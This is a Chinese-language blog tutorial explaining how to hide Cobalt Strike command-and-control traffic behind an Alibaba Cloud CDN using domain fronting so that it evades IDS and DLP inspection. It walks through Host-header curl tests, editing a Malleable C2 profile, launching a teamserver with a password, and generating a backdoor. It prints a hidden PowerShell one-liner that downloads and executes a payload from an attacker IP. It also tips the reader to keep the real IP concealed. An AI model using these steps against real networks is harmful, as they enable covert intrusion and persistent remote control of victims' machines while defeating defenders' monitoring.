域前置Cobalt Strike逃避IDS审计

Posted 2021-05-16 Tenet@1014

域前置Cobalt Strike逃避IDS审计

域前置简介

域前置（Domain Fronting）基于HTTPS通用规避技术，也被称为域前端网络攻击技术。

这是一种用来隐藏Metasploit、Cobalt Strike等团队控制服务器流量，以此来一定程度绕过检查器或防火墙检测的技术，如Amazon、Google、Akamai等大型厂商会提供一些域前端技术服务。

域前置技术原理（CDN分发）

通过CDN节点将流量转发到真实的C2服务器，其中CDN节点IP通过识别请求的HOST头进行流量转发，利用我们配置域名的高可信度，如我们可以设置一个微软的子域名，可以有效的躲避DLP、agent等流量检测。原理如下

工作原理（也就是CDN工作原理）

域前置的核心是CDN

CDN工作原理：

同一个IP可以被不同的域名进行绑定加速，再通过HTTP请求包头里的HOST域名来确定访问哪一个。

比如我们ping www.dcpc.com

得到IP：1.81.2.59

通过IP反查域名,可以看到很多域名绑定在这个IP上，这个就是CDN

www.3636.com和www.youka.la都是这个CDN服务器下的域名并且都保定了别名进行CND加速

通过curl访问网页，可以看到HOST头域名

curl -v www.3636.com

指定HOST

curl 1.81.2.59 -H "host:www.3636.com" -v

可以看到，依然可以访问到

如果IP没有绑定HOST www.3636.com，那么就无法访问

（一句话说明：CDN是通过HOST来判断你要访问那个网站的）

当访问www.3636.com这个域名的时候，实际上也是访问同一个CDN服务器，它的IP也是1.81.2.59

此处把IP替换为www.youka.la依然可以访问，并且内容一致

因为是CND服务器，所以会隐藏真实IP，所以C2服务器的真实IP可以得到隐藏保护。

域前置操作

备案域名1个

免费SSL申请：https://help.aliyun.com/document_detail/156645.html?spm=a2c6h.12873639.0.0.52105de0zFR8Tc&source=5176.11533457&userCode=r3yteowb

阿里云CDN控制中心：https://cdn.console.aliyun.com/overview

设置CDN

解析设置

CDN设置

多地ping测试，可以看到多个IP

配置Cobalt Strike

修改C2的profile配置文件

下载C2：https://github.com/xx0hcd/Malleable-C2-Profiles

选择合适的profile文件，修改HOST头为准备好的域名（get和post都要改）

可以CTRL+F 然后全部替换

月师傅的

用c2lint检查一下

./c2lint cdn.profile

开启teamserver

nohup ./teamserver xxx.xx.xx.99 qweqweqwe999 cdn.profile

nohub表示不挂断的运行命令，不然shell断了CS也会连接不上

kali上启动Cobalt Strike

开启监听

生成后门

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://1xx.xx.xx.99:8080/a'))"

实际使用中，不能直接把真实IP暴露出来，应该另存为网页，通过其他IP进行访问

成功加密